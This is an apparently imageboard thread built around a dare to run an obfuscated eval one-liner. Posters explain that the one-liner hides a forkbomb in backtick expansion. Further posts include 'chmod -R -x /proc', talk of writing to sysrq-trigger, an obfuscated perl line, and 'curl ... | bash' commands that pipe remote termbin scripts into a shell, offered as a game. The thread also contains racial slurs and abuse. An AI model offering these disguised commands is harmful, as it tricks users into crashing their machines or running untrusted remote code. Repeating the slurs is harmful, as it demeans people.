I dare you to run this

I dare you to run this.

eval $(echo "I

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>t. CIA

bash: rofl: command not found

More like user: life not found lmfao

>OH NO the second poster of the thread baffled my epic ruse ;_;
fuck off

i dare you to poo in the loo

No.

Is that the zelda music? neat

>I

wtf it made my GRUB transgender?

The uudecode is merely a ruse. The juicy part is the forkbomb between backticks.

; eval $(echo "I

can you help me understand what this actually does? i'm genuinely curious. i know it does a forkbomb type of thing where it kills the resources but does it do more than that?

` &r()( &r{, }&r{, });r` " now i fucking see.

'eval' is not recognized as an internal or external command,
operable program or batch file.

For OP's satisfaction, I ran this under user nobody, but because of a severely misconfigured server with a ulimit of 63251 user threads. The only way I did manage to bring everything back up was a
systemctl reboot -f -f
as "kill -49 1" (SIGRTMIN+15 as "Immediately reboots the machine." according to the man page) didn't work as expected.

>babby's first forkbomb disguised in hard to read backtick expansion.

Epic

Reboot Even If System Utterly Broken

Second or third one probably have fucked me up even more over a SSH session if I had written them to /proc/sysrq-trigger.

based

>2019
>operating systems still can't survive a fork bomb
Really? I'd expect any half decent one to have some sort of mitigation at this point, but they all fall over.

This isnt something that's hard to stop. There are plenty of primitive posix and more linux specific mechanisms to prevent this kind of attack.

chmod -R -x /proc
ahhahah

Does this work for anyone?
echo "test... test... test..." | perl -e '$??s:;s:s;;$?::s;;=]=>%-{

And yet the forkbomb always succeeds.

openbsd doesn't have this problem

Can't have a problem if nobody's using it.

The fork bomb won't work on OpenBSD due to the resource usage limits.

That was fun.

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First one to get to the end wins a prize
curl -s termbin.com/12ia | bash

ouroboros

No, it does have an end, and you could easily script to find it. Guess you're a nigger tho

BASED.

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>implying you can't set those limits in any other ooonucks-loike os

recursive bash

Over 100 bin, I admire the work.

>the work
termlink='termbin.com/sozy'
for((i=0;i